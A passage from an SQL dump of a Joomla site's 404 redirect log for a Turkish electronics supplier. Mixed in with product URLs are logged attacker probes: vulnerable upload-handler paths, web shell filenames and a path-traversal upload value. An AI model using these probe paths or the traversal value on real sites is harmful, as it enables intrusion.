00:00:00',301),(21290,'http://3s-technologies.com.tr/en/awstats/cgi-bin/awstats.pl',NULL,'','',1,0,'2018-10-15 17:12:14','0000-00-00 00:00:00',301),(21291,'http://3s-technologies.com.tr/en/webstat/awstats.pl',NULL,'','',1,0,'2018-10-15 21:42:36','0000-00-00 00:00:00',301),(21292,'http://3s-technologies.com.tr/en/statistics/awstats.pl',NULL,'','',1,0,'2018-10-16 00:31:44','0000-00-00 00:00:00',301),(21293,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/rh2-detail',NULL,'','',10,0,'2018-10-16 10:55:21','0000-00-00 00:00:00',301),(21294,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/avf-detail',NULL,'','',5,0,'2018-10-16 11:20:36','0000-00-00 00:00:00',301),(21295,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-10-16 12:31:18','0000-00-00 00:00:00',301),(21296,'http://www.3s-technologies.com.tr/en/images/logo_img.php',NULL,'http://www.3s-technologies.com.tr/images/logo_img.php','',1,0,'2018-10-16 13:41:49','0000-00-00 00:00:00',301),(21297,'http://www.3s-technologies.com.tr/en/cli/logo_img.php',NULL,'http://www.3s-technologies.com.tr/cli/logo_img.php','',1,0,'2018-10-16 13:42:08','0000-00-00 00:00:00',301),(21298,'http://www.3s-technologies.com.tr/en/language/logo_img.php',NULL,'http://www.3s-technologies.com.tr/language/logo_img.php','',1,0,'2018-10-16 13:59:21','0000-00-00 00:00:00',301),(21299,'http://www.3s-technologies.com.tr/en/layouts/logo_img.php',NULL,'http://www.3s-technologies.com.tr/layouts/logo_img.php','',1,0,'2018-10-16 14:07:07','0000-00-00 00:00:00',301),(21300,'http://www.3s-technologies.com.tr/en/plugins/content/apismtp/apismtp.php?test=hello',NULL,'http://www.3s-technologies.com.tr/plugins/content/apismtp/apismtp.php?test=hello','',6,0,'2018-10-17 14:51:56','0000-00-00 00:00:00',301),(21301,'http://www.3s-technologies.com.tr/en/media/logo_img.php',NULL,'http://www.3s-technologies.com.tr/media/logo_img.php','',1,0,'2018-10-17 14:59:09','0000-00-00 00:00:00',301),(21302,'http://www.3s-technologies.com.tr/en/libraries/logo_img.php',NULL,'http://www.3s-technologies.com.tr/libraries/logo_img.php','',1,0,'2018-10-17 14:59:14','0000-00-00 00:00:00',301),(21303,'http://www.3s-technologies.com.tr/en/modules/logo_img.php',NULL,'http://www.3s-technologies.com.tr/modules/logo_img.php','',1,0,'2018-10-17 15:04:47','0000-00-00 00:00:00',301),(21304,'http://www.3s-technologies.com.tr/en/templates/logo_img.php',NULL,'http://www.3s-technologies.com.tr/templates/logo_img.php','',1,0,'2018-10-17 15:04:52','0000-00-00 00:00:00',301),(21305,'http://www.3s-technologies.com.tr/en/xmlrpc/logo_img.php',NULL,'http://www.3s-technologies.com.tr/xmlrpc/logo_img.php','',1,0,'2018-10-17 15:10:43','0000-00-00 00:00:00',301),(21306,'http://3s-technologies.com.tr/tr/media/hd.txt',NULL,'','',1,0,'2018-10-17 16:19:30','0000-00-00 00:00:00',301),(21307,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/hacked.gif',NULL,'','',1,0,'2018-10-17 16:19:32','0000-00-00 00:00:00',301),(21308,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/shellcom.php',NULL,'','',1,0,'2018-10-17 16:19:32','0000-00-00 00:00:00',301),(21309,'http://3s-technologies.com.tr/tr/tmp/plupload/owned.html',NULL,'','',1,0,'2018-10-17 16:19:34','0000-00-00 00:00:00',301),(21310,'http://3s-technologies.com.tr/tr/console/css/dashboard-min.css',NULL,'','',1,0,'2018-10-18 03:51:12','0000-00-00 00:00:00',301),(21311,'http://3s-technologies.com.tr/tr/status',NULL,'','',1,0,'2018-10-18 03:51:13','0000-00-00 00:00:00',301),(21312,'http://3s-technologies.com.tr/tr/c',NULL,'','',13,0,'2018-10-18 10:40:39','0000-00-00 00:00:00',301),(21313,'http://3s-technologies.com.tr/tr/images/def.gif',NULL,'','',28,0,'2018-10-18 10:44:16','0000-00-00 00:00:00',301),(21314,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',44,0,'2018-10-18 10:45:39','0000-00-00 00:00:00',301),(21315,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload',NULL,'','',42,0,'2018-10-18 10:46:15','0000-00-00 00:00:00',301),(21316,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload',NULL,'','',1,0,'2018-10-18 10:46:15','0000-00-00 00:00:00',301),(21317,'http://3s-technologies.com.tr/tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',44,0,'2018-10-18 10:46:28','0000-00-00 00:00:00',301),(21318,'http://3s-technologies.com.tr/tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2018-10-18 10:46:28','0000-00-00 00:00:00',301),(21319,'http://3s-technologies.com.tr/tr/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',44,0,'2018-10-18 10:46:33','0000-00-00 00:00:00',301),(21320,'http://3s-technologies.com.tr//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../4p4.php',NULL,'','',1,0,'2018-10-18 11:28:54','0000-00-00 00:00:00',301),(21321,'http://3s-technologies.com.tr/en/image-gallery?format=feed&type=rss',NULL,'','',3,0,'2018-10-19 10:59:09','0000-00-00 00:00:00',301),(21322,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/explore.gif',NULL,'','',5,0,'2018-10-21 02:25:54','0000-00-00 00:00:00',301),(21323,'http://3s-technologies.com.tr/tr//administrator/index.php',NULL,'','',490,0,'2018-10-22 16:37:36','0000-00-00 00:00:00',301),(21324,'http://www.3s-technologies.com.tr/tr/css_.php',NULL,'http://www.3s-technologies.com.tr/tr/css_.php','',5,0,'2018-10-23 10:56:13','0000-00-00 00:00:00',301),(21325,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/index.php?option=com_user&view=register',NULL,'','',2,0,'2018-10-24 08:34:09','0000-00-00 00:00:00',301),(21326,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/component/users/?view=registration',NULL,'','',2,0,'2018-10-24 08:34:09','0000-00-00 00:00:00',301),(21327,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/component/users/?view=register',NULL,'','',2,0,'2018-10-24 08:34:09','0000-00-00 00:00:00',301),(21328,'http://3s-technologies.com.tr/tr/cache_.php',NULL,'','',2,0,'2018-10-24 20:19:19','0000-00-00 00:00:00',301),(21329,'http://mail.3s-technologies.com.tr/tr/wp-login.php',NULL,'','',417,0,'2018-10-25 05:38:42','0000-00-00 00:00:00',301),(21330,'http://mail.3s-technologies.com.tr/tr/robots.txt',NULL,'','',1305,0,'2018-10-25 05:38:59','0000-00-00 00:00:00',301),(21331,'http://3s-technologies.com.tr/tr/?r?nler/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',1,0,'2018-10-25 10:09:57','0000-00-00 00:00:00',301),(21332,'http://3s-technologies.com.tr/tr/?r?nler/thru-hole',NULL,'','',8,0,'2018-10-28 03:54:19','0000-00-00 00:00:00',301),(21333,'http://3s-technologies.com.tr/tr/wp-json/wp/v2/users',NULL,'','',7,0,'2018-10-29 04:05:40','0000-00-00 00:00:00',301),(21334,'http://3s-technologies.com.tr/tr/components/com_foxcontact/lib/file-uploader.php',NULL,'http://3s-technologies.com.tr/tr/components/com_foxcontact/lib/file-uploader.php','',4,0,'2018-10-29 05:33:19','0000-00-00 00:00:00',301),(21335,'http://3s-technologies.com.tr/en/components/com_foxcontact/lib/file-uploader.php',NULL,'http://3s-technologies.com.tr/components/com_foxcontact/lib/file-uploader.php','',1,0,'2018-10-29 09:04:48','0000-00-00 00:00:00',301),(21336,'http://www.3s-technologies.com.tr/en/modules/productpageadverts/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/productpageadverts/uploadimage.php','',2,0,'2018-10-30 11:03:10','0000-00-00 00:00:00',301),(21337,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri',NULL,'','',6,0,'2018-10-30 17:28:15','0000-00-00 00:00:00',301),(21338,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/screen-printer',NULL,'','',6,0,'2018-10-30 17:28:22','0000-00-00 00:00:00',301),(21339,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/homepage2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',5,0,'2018-10-30 17:28:27','0000-00-00 00:00:00',301),(21340,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',5,0,'2018-10-30 17:28:30','0000-00-00 00:00:00',301),(21341,'http://3s-technologies.com.tr/en/seos.php',NULL,'3s-technologies.com.tr','',1,0,'2018-10-30 17:36:48','0000-00-00 00:00:00',301),(21342,'http://3s-technologies.com.tr/en/templates/beez3/seos.php',NULL,'3s-technologies.com.tr','',1,0,'2018-10-30 17:38:49','0000-00-00 00:00:00',301),(21343,'http://www.3s-technologies.com.tr/tr/?r?nler/smd-f1r1n',NULL,'','',3,0,'2018-10-31 13:09:22','0000-00-00 00:00:00',301),(21344,'http://www.3s-technologies.com.tr/tr/?r?nler/smd-d?_?k-h1zl1',NULL,'','',3,0,'2018-10-31 13:09:53','0000-00-00 00:00:00',301),(21345,'http://www.3s-technologies.com.tr/tr/?r?nler/dalga-lehim',NULL,'','',3,0,'2018-10-31 13:11:29','0000-00-00 00:00:00',301),(21346,'http://www.3s-technologies.com.tr/tr/sitemap.xml',NULL,'','',189,0,'2018-11-01 03:12:13','0000-00-00 00:00:00',301),(21347,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-120x120-precomposed.png',NULL,'','',12,0,'2018-11-01 16:42:35','0000-00-00 00:00:00',301),(21348,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-120x120.png',NULL,'','',12,0,'2018-11-01 16:42:36','0000-00-00 00:00:00',301),(21349,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',2,0,'2018-11-01 17:10:24','0000-00-00 00:00:00',301),(21350,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/results,1-50',NULL,'','',2,0,'2018-11-01 17:10:33','0000-00-00 00:00:00',301),(21351,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-11-01 17:10:52','0000-00-00 00:00:00',301),(21352,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/results,1-10',NULL,'','',2,0,'2018-11-01 17:11:03','0000-00-00 00:00:00',301),(21353,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/results,1-5',NULL,'','',2,0,'2018-11-01 17:11:16','0000-00-00 00:00:00',301),(21354,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-50',NULL,'','',1,0,'2018-11-01 17:11:28','0000-00-00 00:00:00',301),(21355,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/results,1-20',NULL,'','',2,0,'2018-11-01 17:11:44','0000-00-00 00:00:00',301),(21356,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,ordering/results,1-50',NULL,'','',1,0,'2018-11-01 17:12:06','0000-00-00 00:00:00',301),(21357,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,mf_name/results,1-50',NULL,'','',1,0,'2018-11-01 17:13:14','0000-00-00 00:00:00',301),(21358,'http://3s-technologies.com.tr/tr/restore.php',NULL,'','',1,0,'2018-11-04 19:44:30','0000-00-00 00:00:00',301),(21359,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/dirdesc',NULL,'','',16,0,'2018-11-06 00:41:21','0000-00-00 00:00:00',301),(21360,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_sku',NULL,'','',14,0,'2018-11-06 00:41:35','0000-00-00 00:00:00',301),(21361,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name',NULL,'','',17,0,'2018-11-06 00:41:53','0000-00-00 00:00:00',301),(21362,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_name',NULL,'','',17,0,'2018-11-06 00:42:31','0000-00-00 00:00:00',301),(21363,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/results,1-50',NULL,'','',12,0,'2018-11-06 00:42:47','0000-00-00 00:00:00',301),(21364,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name',NULL,'','',11,0,'2018-11-06 00:43:15','0000-00-00 00:00:00',301),(21365,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/results,1-10',NULL,'','',6,0,'2018-11-06 00:43:43','0000-00-00 00:00:00',301),(21366,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/results,1-5',NULL,'','',7,0,'2018-11-06 00:44:13','0000-00-00 00:00:00',301),(21367,'http://www.3s-technologies.com.tr/tr/ookbzcrtllvijs.html',NULL,'','',1,0,'2018-11-06 04:29:18','0000-00-00 00:00:00',301),(21368,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,mf_name/results,1-5',NULL,'','',1,0,'2018-11-06 06:47:30','0000-00-00 00:00:00',301),(21369,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name/results,1-5',NULL,'','',1,0,'2018-11-06 06:47:30','0000-00-00 00:00:00',301),(21370,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-11-06 15:49:41','0000-00-00 00:00:00',301),(21371,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-11-06 15:51:13','0000-00-00 00:00:00',301),(21372,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-11-06 15:51:17','0000-00-00 00:00:00',301),(21373,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-11-06 15:51:49','0000-00-00 00:00:00',301),(21374,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,ordering/results,1-5',NULL,'','',1,0,'2018-11-06 16:32:22','0000-00-00 00:00:00',301),(21375,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-11-06 16:57:36','0000-00-00 00:00:00',301),(21376,'http://3s-technologies.com.tr/system/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 06:04:30','0000-00-00 00:00:00',301),(21377,'http://3s-technologies.com.tr/system/storage/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 11:55:50','0000-00-00 00:00:00',301),(21378,'http://www.3s-technologies.com.tr/en/modules/vtemslideshow/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/vtemslideshow/uploadimage.php','',2,0,'2018-11-07 13:37:19','0000-00-00 00:00:00',301),(21379,'http://3s-technologies.com.tr/cache/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 17:45:17','0000-00-00 00:00:00',301),(21380,'http://www.3s-technologies.com.tr/en/home-en/license.php',NULL,'','',2,0,'2018-11-07 21:33:33','0000-00-00 00:00:00',301),(21381,'http://3s-technologies.com.tr/en/?option=com_easybookreloaded',NULL,'','',1,0,'2018-11-08 14:16:48','0000-00-00 00:00:00',301),(21382,'http://3s-technologies.com.tr/tr/libraries/lol.php',NULL,'','',19,0,'2018-11-08 21:41:24','0000-00-00 00:00:00',301),(21383,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_name/results,1-10',NULL,'','',1,0,'2018-11-09 07:10:28','0000-00-00 00:00:00',301),(21384,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,category_name/results,1-10',NULL,'','',1,0,'2018-11-09 07:10:35','0000-00-00 00:00:00',301),(21385,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc',NULL,'','',3,0,'2018-11-09 21:28:56','0000-00-00 00:00:00',301),(21386,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,1-5',NULL,'','',3,0,'2018-11-09 21:29:00','0000-00-00 00:00:00',301),(21387,'http://3s-technologies.com.tr/tr/cggolcpxljsxttue.html',NULL,'','',1,0,'2018-11-10 08:32:12','0000-00-00 00:00:00',301),(21388,'http://3s-technologies.com.tr/assets/images/accesson.php',NULL,'3s-technologies.com.tr','',8,0,'2018-11-10 10:35:13','0000-00-00 00:00:00',301),(21389,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-10',NULL,'','',12,0,'2018-11-10 10:37:10','0000-00-00 00:00:00',301),(21390,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-50',NULL,'','',13,0,'2018-11-10 10:38:56','0000-00-00 00:00:00',301),(21391,'http://3s-technologies.com.tr/tr/ovscz',NULL,'hghprescribed.com','',4,0,'2018-11-10 12:46:26','0000-00-00 00:00:00',301),(21392,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&lang=en&format=feed&type=atom',NULL,'','',1,0,'2018-11-10 22:58:29','0000-00-00 00:00:00',301),(21393,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,product_sku/results,1-30?error=404',NULL,'','',6,0,'2018-11-10 23:52:34','0000-00-00 00:00:00',301),(21394,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-11-11 03:11:11','0000-00-00 00:00:00',301),(21395,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,mf_name/results,1-5',NULL,'','',2,0,'2018-11-11 03:11:59','0000-00-00 00:00:00',301),(21396,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-5',NULL,'','',2,0,'2018-11-11 03:12:25','0000-00-00 00:00:00',301),(21397,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,ordering/results,1-5',NULL,'','',2,0,'2018-11-11 03:12:51','0000-00-00 00:00:00',301),(21398,'http://3s-technologies.com.tr/tr/ccd.htm',NULL,'','',1,0,'2018-11-11 05:06:33','0000-00-00 00:00:00',301),(21399,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/dirdesc?language=en-gb',NULL,'','',1,0,'2018-11-11 10:12:40','0000-00-00 00:00:00',301),(21400,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2018-11-11 10:13:01','0000-00-00 00:00:00',301),(21401,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2018-11-11 10:13:21','0000-00-00 00:00:00',301),(21402,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2018-11-11 10:13:37','0000-00-00 00:00:00',301),(21403,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2018-11-11 10:13:52','0000-00-00 00:00:00',301),(21404,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2018-11-11 10:14:09','0000-00-00 00:00:00',301),(21405,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2018-11-11 10:14:35','0000-00-00 00:00:00',301),(21406,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2018-11-11 10:14:47','0000-00-00 00:00:00',301),(21407,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2018-11-11 10:15:01','0000-00-00 00:00:00',301),(21408,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2018-11-11 10:15:24','0000-00-00 00:00:00',301),(21409,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2018-11-11 10:15:48','0000-00-00 00:00:00',301),(21410,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim?language=en-gb',NULL,'','',1,0,'2018-11-11 10:16:02','0000-00-00 00:00:00',301),(21411,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/screen-printer?language=en-gb',NULL,'','',1,0,'2018-11-11 10:16:17','0000-00-00 00:00:00',301),(21412,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/screen-printer?language=en-gb',NULL,'','',1,0,'2018-11-11 10:16:30','0000-00-00 00:00:00',301),(21413,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/dalga-lehim?language=en-gb',NULL,'','',1,0,'2018-11-11 10:16:54','0000-00-00 00:00:00',301),(21414,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturers/aqueous',NULL,'','',5,0,'2018-11-11 11:01:55','0000-00-00 00:00:00',301),(21415,'http://3s-technologies.com.tr/en/manager/index.php',NULL,'http://3s-technologies.com.tr/manager/index.php','',1,0,'2018-11-11 15:01:30','0000-00-00 00:00:00',301),(21416,'http://3s-technologies.com.tr/tr/?r?nler/manufacturers/aqueous',NULL,'','',4,0,'2018-11-12 04:54:59','0000-00-00 00:00:00',301),(21417,'http://3s-technologies.com.tr/tr/?r?nler/lehimleme-malzemeleri/flux',NULL,'','',4,0,'2018-11-12 04:57:29','0000-00-00 00:00:00',301),(21418,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-100',NULL,'','',1,0,'2018-11-12 12:12:05','0000-00-00 00:00:00',301),(21419,'http://www.3s-technologies.com.tr/index.php/en/component/content/category?format=feed&type=atom',NULL,'','',6,0,'2018-11-12 17:53:46','0000-00-00 00:00:00',301),(21420,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&lang=en&format=feed&type=rss',NULL,'','',1,0,'2018-11-14 04:37:20','0000-00-00 00:00:00',301),(21421,'http://mail.3s-technologies.com.tr/tr/xmlrpc.php',NULL,'http://www.google.com.hk','',34,0,'2018-11-14 05:02:44','0000-00-00 00:00:00',301),(21422,'https://www.3s-technologies.com.tr/en/escort-paris.org',NULL,'https://www.3s-technologies.com.tr/escort-paris.org%2F','',1,0,'2018-11-14 12:30:57','0000-00-00 00:00:00',301),(21423,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',2,0,'2018-11-14 20:05:44','0000-00-00 00:00:00',301),(21424,'http://www.3s-technologies.com.tr/tr/libraries/joomla/jmail.php',NULL,'','',17,0,'2018-11-15 08:18:04','0000-00-00 00:00:00',301),(21425,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-gdpr-compliance/readme.txt',NULL,'','',1,0,'2018-11-15 22:43:52','0000-00-00 00:00:00',301),(21426,'http://3s-technologies.com.tr/tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'http://3s-technologies.com.tr/tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','',2,0,'2018-11-16 04:37:19','0000-00-00 00:00:00',301),(21427,'http://3s-technologies.com.tr/en/?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'http://3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','',4,0,'2018-11-16 07:54:55','0000-00-00 00:00:00',301),(21428,'http://3s-technologies.com.tr/tr/admin/index.php',NULL,'https://google.com','',69,0,'2018-11-16 22:46:26','0000-00-00 00:00:00',301),(21429,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,ordering/results,1-10',NULL,'','',1,0,'2018-11-17 10:15:34','0000-00-00 00:00:00',301),(21430,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-10',NULL,'','',1,0,'2018-11-17 10:16:07','0000-00-00 00:00:00',301),(21431,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-11-17 10:17:27','0000-00-00 00:00:00',301),(21432,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,mf_name/results,1-10',NULL,'','',1,0,'2018-11-17 10:18:14','0000-00-00 00:00:00',301),(21433,'http://www.3s-technologies.com.tr/en/assets/components/gallery/css/fileuploader.css',NULL,'http://www.3s-technologies.com.tr/assets/components/gallery/css/fileuploader.css','',1,0,'2018-11-17 14:41:17','0000-00-00 00:00:00',301),(21434,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-20',NULL,'','',1,0,'2018-11-17 20:58:08','0000-00-00 00:00:00',301),(21435,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2018-11-17 20:58:12','0000-00-00 00:00:00',301),(21436,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,ordering/results,1-20',NULL,'','',1,0,'2018-11-17 20:58:17','0000-00-00 00:00:00',301),(21437,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-11-17 20:58:21','0000-00-00 00:00:00',301),(21438,'http://3s-technologies.com.tr/tr/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',1,0,'2018-11-19 12:41:10','0000-00-00 00:00:00',301),(21439,'http://3s-technologies.com.tr/en/assets/components/gallery/css/mgr.css',NULL,'http://3s-technologies.com.tr/assets/components/gallery/css/mgr.css','',2,0,'2018-11-19 15:25:21','0000-00-00 00:00:00',301),(21440,'http://3s-technologies.com.tr/en/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',1,0,'2018-11-19 16:23:33','0000-00-00 00:00:00',301),(21441,'http://www.3s-technologies.com.tr/en/wp-content/themes/ghost/includes/uploadify/upload_settings_image.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','',3,0,'2018-11-20 04:37:20','0000-00-00 00:00:00',301),(21442,'http://3s-technologies.com.tr/tr/modules/mod_artuploader/js/ajaxupload.js',NULL,'http://3s-technologies.com.tr/tr/modules/mod_artuploader/js/ajaxupload.js','',6,0,'2018-11-20 13:09:00','0000-00-00 00:00:00',301),(21443,'http://3s-technologies.com.tr/en/modules/mod_artuploader/js/ajaxupload.js',NULL,'http://3s-technologies.com.tr/modules/mod_artuploader/js/ajaxupload.js','',3,0,'2018-11-20 16:17:57','0000-00-00 00:00:00',301),(21444,'http://3s-technologies.com.tr/tr/modules/mod_dionefileuploader/upload.php',NULL,'http://3s-technologies.com.tr/tr/modules/mod_dionefileuploader/upload.php','',13,0,'2018-11-22 04:14:50','0000-00-00 00:00:00',301),(21445,'http://3s-technologies.com.tr/en/modules/mod_dionefileuploader/upload.php',NULL,'http://3s-technologies.com.tr/modules/mod_dionefileuploader/upload.php','',6,0,'2018-11-22 06:52:39','0000-00-00 00:00:00',301),(21446,'http://3s-technologies.com.tr/tr/dmwfeowdeyhjcph.html',NULL,'','',1,0,'2018-11-22 14:43:25','0000-00-00 